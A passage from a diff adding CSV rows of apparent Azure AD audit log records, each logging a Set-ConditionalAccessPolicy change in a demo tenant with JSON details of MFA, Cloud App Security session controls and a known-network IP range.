+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-01T03:11:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 3:11:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T03:11:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 3:11:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T03:11:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 3:11:37 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T03:11:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 3:11:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T03:11:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 3:11:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T03:11:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 3:11:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T03:11:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 3:11:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T03:11:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 3:11:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T03:11:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 3:11:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T03:11:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 3:11:37 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T03:11:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 3:11:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T03:11:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 3:11:33 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T05:59:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 5:59:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T05:59:11Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 5:59:11 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T05:59:10Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 5:59:10 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T05:59:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 5:59:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T05:59:11Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 5:59:11 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T05:59:10Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 5:59:10 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T05:59:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 5:59:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-01T05:59:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 5:59:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T05:59:11Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 5:59:11 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T05:59:09Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 5:59:09 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T05:59:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 5:59:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T05:59:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 5:59:11 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
